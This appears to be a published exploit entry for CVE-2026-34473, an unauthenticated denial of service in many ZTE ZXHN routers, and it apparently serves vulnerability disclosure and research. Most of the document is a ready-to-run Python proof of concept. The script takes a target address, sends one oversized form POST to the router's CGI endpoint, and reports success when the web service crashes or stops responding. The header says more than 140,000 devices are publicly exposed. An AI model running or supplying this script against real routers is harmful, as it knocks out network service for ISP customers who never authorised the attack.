# Exploit Title: ZTE Routers - Unauthenticated Denial of Service # Date: 2026-05-20 # Exploit Author: Mina Nageh Salalma (Monx Research) # Vendor Homepage: https://www.zte.com.cn # Software Link: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers # Version: Multiple ZTE router models (17+ confirmed) # Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed devices # CVE: CVE-2026-34473 # Description: # The CGILua post.lua parser in 17+ ZTE router models does not enforce a # maximum body size for application/x-www-form-urlencoded POST requests. # An unauthenticated attacker can crash or freeze the router's web service # by sending a single oversized POST request to any CGI endpoint. # No authentication, session, or credentials are required. # # Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide. # Estimated 140,000+ publicly reachable devices at time of research. # # MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473 # PoC (Python 3) import requests import sys def dos_exploit(target, size_kb=256): """ CVE-2026-34473 - Unauthenticated DoS Sends oversized POST body to crash ZTE CGILua web service. """ url = f"http://{target}/cgi-bin/luci" payload = "a=" + "A" * (size_kb * 1024) headers = {"Content-Type": "application/x-www-form-urlencoded"} try: r = requests.post(url, data=payload, headers=headers, timeout=15) print(f"[+] {target} responded with HTTP {r.status_code} (device may still be up)") except requests.exceptions.ConnectionError: print(f"[!] {target} - Connection refused or dropped: device web service likely crashed (DoS successful)") except requests.exceptions.Timeout: print(f"[!] {target} - Timeout: device web service unresponsive (DoS successful)") except Exception as e: print(f"[-] {target}: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: poc.py [payload_size_kb]") sys.exit(1) size = int(sys.argv[2]) if len(sys.argv) > 2 else 256 dos_exploit(sys.argv[1], size)